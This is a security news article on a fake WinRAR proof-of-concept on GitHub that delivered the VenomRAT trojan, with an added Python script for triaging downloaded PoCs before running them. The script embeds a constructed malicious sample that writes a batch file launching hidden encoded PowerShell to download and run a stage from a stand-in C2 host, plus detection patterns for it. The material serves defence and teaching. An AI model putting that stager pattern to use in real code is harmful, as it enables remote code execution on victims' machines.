Beware: Fake WinRAR Vulnerability PoC Exposed
A threat actor recently posted a fake proof-of-concept (PoC) exploit for an already-patched WinRAR vulnerability to GitHub. The repository was not meant to demonstrate the bug at all; its purpose was to infect anyone who ran the code with the VenomRAT remote access trojan. Although this particular campaign has been exposed, the incident highlights the risk of running PoCs obtained from services such as GitHub without first vetting them for safety.
Discovery of the Fake PoC
The fake PoC was analysed by researchers from Palo Alto Networks’ Unit 42, who published their findings on September 19, 2023. The attacker had uploaded the malicious repository to GitHub on August 21, 2023. The campaign was exposed, but the episode is a clear reminder of the risks that come with unverified PoCs.
The fabricated PoC claimed to exploit CVE-2023-40477, a flaw in how WinRAR versions before 6.23 process recovery volumes that allows arbitrary code execution when a specially crafted RAR archive is opened. Trend Micro’s Zero Day Initiative (ZDI) reported the bug to the vendor on June 8, 2023, and published its public advisory on August 17, 2023. WinRAR had already fixed the issue in version 6.23, released on August 2, 2023, so a patch was available by the time the flaw became public.
The Swift Actions of the Threat Actor
A GitHub user going by “whalersplonk” seized the opportunity quickly, disguising malware as exploit code for the new WinRAR flaw. To lend the package legitimacy, the actor included a summary in the repository’s README file and a demonstration video hosted on Streamable showing how to use the PoC.
What Unit 42 found was more concerning. The supposed Python PoC script turned out to be a modified copy of a publicly available exploit for an unrelated vulnerability, CVE-2023-25157, a critical SQL injection bug in GeoServer. A script built around GeoServer HTTP requests has no plausible way of triggering a memory-corruption bug in an archive parser, which is the first thing a reader of the code would have noticed.
The VenomRAT Menace
Rather than exploiting anything, the fake WinRAR PoC created a batch script. That script downloaded and executed an encoded PowerShell script on the victim’s host, which in turn installed VenomRAT and set off the rest of the attack chain.
Once running on a Windows machine, VenomRAT started a keylogger that recorded every keystroke to a local text file. It then checked in with a command-and-control (C2) server and processed the commands it received, which ranged from activating plugins stored in the registry to deleting subkeys under the Software registry key. The malware could also compute the interval between its pings to the C2 server.
Because VenomRAT can deploy additional payloads and steal credentials, anyone who ran the fake PoC should treat the host as compromised and reset passwords for every account and environment that was reachable from it.
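The two tells described above (a script that targets the wrong product, and a script that writes a batch file and launches encoded PowerShell) can both be caught by reading the PoC before running it. The following is an added example of that static triage, written for this page rather than taken from Unit 42 or from the whalersplonk repository. The SAMPLE_POC and BENIGN_POC strings are constructed stand-ins that only mimic the behaviour the write-up describes; the encoded payload points at a reserved .invalid hostname so nothing resolves or executes.

```python
"""Static triage of a downloaded 'PoC' before anyone runs it.

Added example, not Unit 42 tooling and not the malicious script itself.
It flags the behaviours the write-up describes: dropping a .bat file,
launching PowerShell with an -EncodedCommand argument, and code paths
that target a different product than the README claims.
"""
import base64
import re
from typing import Optional

# --- constructed sample inputs (not real malware) -------------------------
_FAKE_PAYLOAD = ("IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://c2.example.invalid/stage2.ps1')")
# PowerShell -EncodedCommand takes base64 of the UTF-16LE command text.
_FAKE_ENC = base64.b64encode(_FAKE_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_POC = f'''
# CVE-2023-40477 WinRAR RCE proof of concept (claimed)
import requests, subprocess

def exploit(host):
    # leftover from the GeoServer CVE-2023-25157 SQLi exploit it was copied from
    url = "http://" + host + "/geoserver/wfs?service=WFS&request=GetFeature&CQL_FILTER=1%3D1"
    requests.get(url)
    bat = "powershell.exe -w hidden -nop -enc {_FAKE_ENC}\\r\\n"
    with open("Local.bat", "w") as f:
        f.write(bat)
    subprocess.call(["cmd.exe", "/c", "Local.bat"])
'''

BENIGN_POC = '''
# Builds a crafted archive for opening in an isolated VM
with open("poc.rar", "wb") as f:
    f.write(b"Rar!\\x1a\\x07\\x01\\x00" + b"A" * 64)
'''

# --- triage logic ----------------------------------------------------------
ENCODED_PS_RE = re.compile(
    r"""powershell(?:\.exe)?[^\n"']*?\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})""",
    re.IGNORECASE,
)

# Strings a PoC for each product would be expected to contain in its code.
PRODUCT_FINGERPRINTS = {
    "winrar": [r"\.rar\b", r"Rar!", r"\bRAR\b"],
    "geoserver": [r"/geoserver/", r"CQL_FILTER", r"service=WFS"],
}


def strip_comments(source: str) -> str:
    """Drop '#' comments so README-style claims in comments do not count as code."""
    return re.sub(r"#.*", "", source)


def decode_encoded_powershell(token: str) -> Optional[str]:
    """Decode an -EncodedCommand argument; None if it is not valid base64/UTF-16LE text."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(ch.isprintable() or ch in "\r\n\t" for ch in text) else None


def find_indicators(source: str) -> dict:
    code = strip_comments(source)
    return {
        "spawns_process": bool(re.search(
            r"\b(?:subprocess\.\w+|os\.system|os\.popen|os\.exec\w*)\s*\(", code)),
        "drops_batch_file": bool(re.search(r"\.(?:bat|cmd)\b", code, re.IGNORECASE)),
        "encoded_powershell": [decode_encoded_powershell(m.group(1)) or "<undecodable>"
                               for m in ENCODED_PS_RE.finditer(code)],
    }


def target_mismatch(source: str, claimed: str) -> dict:
    code = strip_comments(source)
    seen = {name: any(re.search(p, code) for p in pats)
            for name, pats in PRODUCT_FINGERPRINTS.items()}
    return {
        "claimed_product_seen": seen.get(claimed, False),
        "other_products_seen": sorted(n for n, s in seen.items() if s and n != claimed),
    }


def triage(source: str, claimed_product: str) -> dict:
    """Return a verdict with human-readable reasons; any reason marks the PoC suspicious."""
    ind, tm, reasons = find_indicators(source), target_mismatch(source, claimed_product), []
    if ind["spawns_process"]:
        reasons.append("spawns a child process; verify exactly what it runs")
    if ind["drops_batch_file"]:
        reasons.append("writes or runs a .bat/.cmd file")
    for cmd in ind["encoded_powershell"]:
        reasons.append(f"launches encoded PowerShell: {cmd}")
    if not tm["claimed_product_seen"]:
        reasons.append(f"no code path touches {claimed_product} at all")
    if tm["other_products_seen"]:
        reasons.append("targets " + ", ".join(tm["other_products_seen"]) + " instead")
    return {"suspicious": bool(reasons), "reasons": reasons,
            "decoded_powershell": ind["encoded_powershell"]}


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_POC), ("benign", BENIGN_POC)):
        verdict = triage(src, "winrar")
        print(name, "SUSPICIOUS" if verdict["suspicious"] else "no static red flags")
        for reason in verdict["reasons"]:
            print("  -", reason)
```

Decoding the -EncodedCommand argument is the step that matters most in practice: an encoded PowerShell stager reads as noise until it is turned back into text, and most fake PoCs rely on nobody doing that. The product fingerprints are deliberately simple; the point is that a PoC for an archive-parsing bug that never writes an archive, while it does assemble GeoServer URLs, should not be executed anywhere.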
Strategic Deception Around the WinRAR Vulnerability
According to the timeline Unit 42 reconstructed, the threat actor built the attack infrastructure and payload well before the WinRAR vulnerability was publicly announced. This preparation suggests the same actor may, in future, take advantage of the attention that newly disclosed vulnerabilities attract to distribute further deceptive PoCs for other issues.
A Broader Threat Landscape
Fraudulent PoCs on platforms such as GitHub are not an isolated phenomenon; security researchers and cybercriminals alike are regularly targeted this way. In late 2022, researchers at Leiden University found thousands of GitHub repositories pushing bogus PoC exploits for numerous vulnerabilities. Many of these repositories delivered malware, malicious PowerShell scripts, hidden info-stealer downloaders, and even Cobalt Strike droppers.
Vigilance is essential. Counterfeit PoCs are a reminder that trust should not be granted by default, least of all in security research and testing. Before running a PoC from an unknown source: read the code and confirm it actually touches the component the advisory describes; be suspicious of anything that spawns processes, writes batch files or launches encoded PowerShell; run it only in an isolated, disposable virtual machine with no access to credentials or production networks; and check that the repository’s history and author look like a genuine researcher rather than a freshly created account.